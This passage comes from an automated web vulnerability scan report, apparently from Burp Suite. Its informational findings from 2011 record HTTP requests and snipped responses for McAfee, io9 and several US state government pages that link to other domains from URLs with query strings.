Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
</span>

<a id="ctl00_m_HeaderFullNavigation_ucMasterNavigation_ucHackerSafe_m_HRefHackerSafe" title="HACKER SAFE certified sites prevent over 99.9% of hacker crime." class="hslogo" href="https://www.scanalert.com/RatingVerify?ref=home.mcafee.com&amp;lang=EN" target="_blank"><img id="ctl00_m_HeaderFullNavigation_ucMasterNavigation_ucHackerSafe_m_ImgHackerSafe" title="Los sitios con McAfee Secure le ayudan a mantenerse a salvo de robos de identidad, fraudes a trav..s de tarjetas de cr..dito, spyware, spam, virus y estafas en Internet." oncontextmenu="javascript:alert(&quot;Copia prohibida por ley - McAfee SECURE es una marca comercial de McAfee&quot;);return false;" src="https://images.scanalert.com/meter/home.mcafee.com/55.gif?lang=EN" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="https://secure.nai.com/apps/about/web_feedback/web_feedback_form.asp?region=MX&amp;segment=consumer">Comentarios acerca del sitio Web</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcstunih010000g0z3wnxhdhh_3m1k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/></div>
...[SNIP]...

19.12. http://home.mcafee.com/Root/AboutUs.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /Root/AboutUs.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Root/AboutUs.aspx?id=contactUs HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Root/AboutUs.aspx?id=contactUs; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fRoot%2fAboutUs.aspx%3fid%3dcontactUs&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV3
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 35336
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
</span>

<a id="ctl00_m_HeaderFullNavigation_ucMasterNavigation_ucHackerSafe_m_HRefHackerSafe" title="HACKER SAFE certified sites prevent over 99.9% of hacker crime." class="hslogo" href="https://www.mcafeesecure.com/RatingVerify?ref=home.mcafee.com&amp;lang=EN" target="_blank"><img id="ctl00_m_HeaderFullNavigation_ucMasterNavigation_ucHackerSafe_m_ImgHackerSafe" title="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams." oncontextmenu="javascript:alert(&quot;Copying Prohibited by Law - McAfee SECURE is a Trademark of McAfee&quot;);return false;" src="https://images.scanalert.com/meter/home.mcafee.com/31.gif?lang=EN" style="border-width:0px;" /></a>
...[SNIP]...
<li class="Leaf">
                           <a href="http://www.mcafeecareers.com" onclick="window.open(this.href, '_blank', ''); return false;" onkeypress="window.open(this.href, '_blank', ''); return false;">
                               Careers</a>
...[SNIP]...
<p>
To report or submit a suspected virus, visit the <a href="http://vil.nai.com/vil/submit-sample.aspx"
target="nai">
AVERT Research Center</a>
...[SNIP]...
<p>
<a href="http://mcafee.careers.monster.com/" target="_blank">Employment Opportunities</a>
...[SNIP]...
<p>
For more contacts, please visit <a href="http://www.nai.com/us/contact/home.htm">McAfee
Worldwide Contacts</a>
...[SNIP]...
<li><a href="http://www.zoomerang.com/survey.zgi?p=WEB226ZLDE6M5P">Website Feedback</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcstunih010000g0z3wnxhdhh_3m1k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/></div>
...[SNIP]...

19.13. http://home.mcafee.com/root/dynamicpage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /root/dynamicpage.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /root/dynamicpage.aspx?page=antipiracypolicy HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/root/dynamicpage.aspx?page=antipiracypolicy; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2froot%2fdynamicpage.aspx%3fpage%3dantipiracypolicy&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:56 GMT
Content-Length: 71190
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...
</span>

<a id="ctl00_m_HeaderFullNavigation_ucMasterNavigation_ucHackerSafe_m_HRefHackerSafe" title="HACKER SAFE certified sites prevent over 99.9% of hacker crime." class="hslogo" href="https://www.mcafeesecure.com/RatingVerify?ref=home.mcafee.com&amp;lang=EN" target="_blank"><img id="ctl00_m_HeaderFullNavigation_ucMasterNavigation_ucHackerSafe_m_ImgHackerSafe" title="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams." oncontextmenu="javascript:alert(&quot;Copying Prohibited by Law - McAfee SECURE is a Trademark of McAfee&quot;);return false;" src="https://images.scanalert.com/meter/home.mcafee.com/31.gif?lang=EN" style="border-width:0px;" /></a>
...[SNIP]...
rotect you from the negative effects of piracy. We've partnered with the Business Software Alliance to accomplish this task, and to strengthen global support for the issue of software piracy. The BSA (<a href="http://www.bsa.org" target="_blank">www.bsa.org</a>
...[SNIP]...
<li><a href="http://www.zoomerang.com/survey.zgi?p=WEB226ZLDE6M5P">Website Feedback</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse.webtrendslive.com/dcstunih010000g0z3wnxhdhh_3m1k/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/></div>
...[SNIP]...

19.14. http://image.providesupport.com/js/hic/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/hic/safe-standard.js?ps_h=q4f5&ps_t=1304201856125&online-image=http%3A//www.ehawaii.gov/dakine/images/livehelp-big.jpg&offline-image=http%3A//www.ehawaii.gov/dakine/images/livehelp-big.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: image.providesupport.com
Cookie: vsid=Gh9fR1o5MmIq

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 4975
Date: Sat, 30 Apr 2011 22:17:13 GMT
Connection: close

var psq4f5sid = "Gh9fR1o5MmIq";
// safe-standard@ie5up.js

var psq4f5iso;
try {
   psq4f5iso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psq4f5wid != null);
} catch(e) {
   psq4f5
...[SNIP]...
<a href="#" onclick="psq4f5ow(); return false;"><img name="psq4f5image" src="http://www.ehawaii.gov/dakine/images/livehelp-big.jpg" border="0"></a>
...[SNIP]...
<a href="#" onclick="psq4f5ow(); return false;"><img name="psq4f5image" src="http://www.ehawaii.gov/dakine/images/livehelp-big.jpg" border="0"></a>
...[SNIP]...

19.15. http://image.providesupport.com/js/hic/safe-standard.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=9k8DdjQMsyWA;Path=/;Domain=.providesupport.com
Content-Length: 4877
Date: Sat, 30 Apr 2011 22:10:03 GMT
Connection: close

var psMygbsid = "9k8DdjQMsyWA";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
<a href="#" onclick="psMygbow(); return false;"><img name="psMygbimage" src="http://www.ehawaii.gov/dakine/images/portal-offline.gif" border="0"></a>
...[SNIP]...
<a href="#" onclick="psMygbow(); return false;"><img name="psMygbimage" src="http://www.ehawaii.gov/dakine/images/portal-offline.gif" border="0"></a>
...[SNIP]...

19.16. http://io9.com/assets/base.v9/js/readability.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://io9.com
Path:   /assets/base.v9/js/readability.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /assets/base.v9/js/readability.js?x=0.5822537930132756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: io9.com
Cookie: NSC_hbxlfs-qppm=8efb34173660

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:19:00 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 15:35:50 GMT
ETag: "1aa0ead-a457-48fc144a58180"
Accept-Ranges: bytes
ntCoent-Length: 42071
Cache-Control: max-age=14400
Expires: Sat, 30 Apr 2011 16:19:00 GMT
Vary: Accept-Encoding
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
GawkerApplicationHost: ganja
GawkerHost: GM39 - Request took D=402 at t=1304165940793200 on site io9.com (live)
Content-Type: application/x-javascript
Content-Length: 42071

var dbg = function(s) {
if(typeof console !== 'undefined') {
console.log("Readability: " + s);
}
};

/*
* Readability. An Arc90 Lab Experiment.
* Website: http://lab.arc90.com/exper
...[SNIP]...
<p>Sorry, readability was unable to parse this page for content. If you feel like it should have been able to, please <a href='http://code.google.com/p/arc90labs-readability/issues/entry'>let us know by submitting an issue.</a>
...[SNIP]...
</a>" +
"<a href='http://www.arc90.com/' id='arc90-logo'>An Arc90 Laboratory Experiment</a>
...[SNIP]...
</span>" +
"<a href='http://www.twitter.com/arc90' class='footer-twitterLink'>Follow us on Twitter &raquo;</a>
...[SNIP]...
<div id='rdb-footer-right'>" +
"<a href='http://www.twitter.com/arc90' class='footer-twitterLink'>Follow us on Twitter &raquo;</a>
...[SNIP]...

19.17. http://kentucky.gov/feedback.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kentucky.gov
Path:   /feedback.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /feedback.aspx?source=/feedbackThanks.aspx HTTP/1.1
Host: kentucky.gov
Proxy-Connection: keep-alive
Referer: http://kentucky.gov/Pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=210812687.1304123849.1.1.utmcsr=ky.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=210812687.1043360039.1304123849.1304123849.1304123849.1; __utmc=210812687; __utmb=210812687.1.10.1304123849

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 20264
Content-Type: text/html; charset=utf-8
Expires: Fri, 15 Apr 2011 00:37:14 GMT
Last-Modified: Sat, 30 Apr 2011 00:37:14 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6514
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=nwf2tqnh55jvn555govocc2q; path=/; HttpOnly
Date: Sat, 30 Apr 2011 00:37:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html dir="ltr">

<head><meta name="ProgId" content="ShareP
...[SNIP]...
</style>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

19.18. http://landmark-project.com/feed2js/feed2js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landmark-project.com
Path:   /feed2js/feed2js.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /feed2js/feed2js.php?src=http%3A%2F%2Fcoemergency.blogspot.com%2Ffeeds%2Fposts%2Fdefault&num=5&date=y&html=p HTTP/1.1
Host: landmark-project.com
Proxy-Connection: keep-alive
Referer: http://dola.colorado.gov/dem/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:23:07 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 1910
Content-Type: application/x-javascript

feed2js_ck = true;

document.write('<div class="rss-box">');
document.write('<ul class="rss-items">');
document.write('<li class="rss-item"><a class="rss-item" href="http://feedproxy.google.com/~r/COEmergency/~3/6WcF6ZfH1Vs/according-to-cathy-prudhomme-community.html" target="_self">2011 Disaster Ready Training Program</a>
...[SNIP]...
<li class="rss-item"><a class="rss-item" href="http://feedproxy.google.com/~r/COEmergency/~3/rNrvW8fXlyo/regional-position-specific-nimsics.html" target="_self">Position-Specific NIMS/ICS Training</a>
...[SNIP]...
<li class="rss-item"><a class="rss-item" href="http://feedproxy.google.com/~r/COEmergency/~3/QqhdRf6jJe8/colorado-severe-weather-tornado-and.html" target="_self">Colorado Tornado and Hail Safety</a>
...[SNIP]...
<li class="rss-item"><a class="rss-item" href="http://feedproxy.google.com/~r/COEmergency/~3/LjCzFwm1gmI/course-announcement-standardizedcredent.html" target="_self">COURSE ANNOUNCEMENT -.Standardized.Credentialing.Program.for Management.of.an.Animal.Emergency</a>
...[SNIP]...
<li class="rss-item"><a class="rss-item" href="http://feedproxy.google.com/~r/COEmergency/~3/jjgeVh5cf0U/course-announcement-evacuation-re-entry.html" target="_self">COURSE ANNOUNCEMENT - Evacuation Re-Entry Planning (G-358) - 6/6-12/2011 - Frisco, CO</a>
...[SNIP]...

19.19. http://legis.delaware.gov/Legislature.nsf/Lookup/House_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /Legislature.nsf/Lookup/House_Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Legislature.nsf/Lookup/House_Home?open&nav=house HTTP/1.1
Host: legis.delaware.gov
Proxy-Connection: keep-alive
Referer: http://de.gov/topics/agencylist_alpha
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 00:38:32 GMT
Last-Modified: Sat, 30 Apr 2011 00:38:30 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 33582
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>House_Home</title> <!-- Global meta tags, external stylesheets and scripts -->
<meta http-equiv=Content-Type conten
...[SNIP]...
<br>- <a href="http://carper.senate.gov/">Senator thomas R. Carper</a>
...[SNIP]...
<br>- <a href="http://coons.senate.gov/">Senator Christopher A. Coons</a><br>- <a href="http://www.johncarney.house.gov/">Representative John C. Carney</a>
...[SNIP]...
<br>- <a href="http://www.delawareinsurance.gov/">Insurance Commissioner Karen Weldin Stewart</a>
...[SNIP]...
<br>- <a href="http://www.deldot.gov/">DelDOT</a><br>- <a href="http://www.dmv.de.gov/">DMV</a><br>- <a href="http://www.doe.k12.de.us/">Education</a>
...[SNIP]...
<br>- <a href="http://www.delawarepersonnel.com/">Human Resources Management</a>
...[SNIP]...
<br>- <a href="http://www.destateparks.com/">Parks and Recreation</a>
...[SNIP]...
<br>- <a href="http://www.delawareworks.com/unemployment/welcome.shtml">Unemployment Insurance</a><br>- <a href="http://www.visitdelaware.com/">Visit Delaware (Tourism)</a>
...[SNIP]...

19.20. http://legis.delaware.gov/legislature.nsf/Lookup/Divisions_Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://legis.delaware.gov
Path:   /legislature.nsf/Lookup/Divisions_Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /legislature.nsf/Lookup/Divisions_Home?open&nav=divisions HTTP/1.1
Host: legis.delaware.gov
Proxy-Connection: keep-alive
Referer: http://legis.delaware.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Sat, 30 Apr 2011 00:39:52 GMT
Last-Modified: Sat, 30 Apr 2011 00:39:50 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 28864
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Divisions_Home</title> <!-- Global meta tags, external stylesheets and scripts -->
<meta http-equiv=Content-Type co
...[SNIP]...
<br>- <a href="http://carper.senate.gov/">Senator thomas R. Carper</a>
...[SNIP]...
<br>- <a href="http://coons.senate.gov/">Senator Christopher A. Coons</a><br>- <a href="http://www.johncarney.house.gov/">Representative John C. Carney</a>
...[SNIP]...
<br>- <a href="http://www.delawareinsurance.gov/">Insurance Commissioner Karen Weldin Stewart</a>
...[SNIP]...
<br>- <a href="http://www.deldot.gov/">DelDOT</a><br>- <a href="http://www.dmv.de.gov/">DMV</a><br>- <a href="http://www.doe.k12.de.us/">Education</a>
...[SNIP]...
<br>- <a href="http://www.delawarepersonnel.com/">Human Resources Management</a>
...[SNIP]...
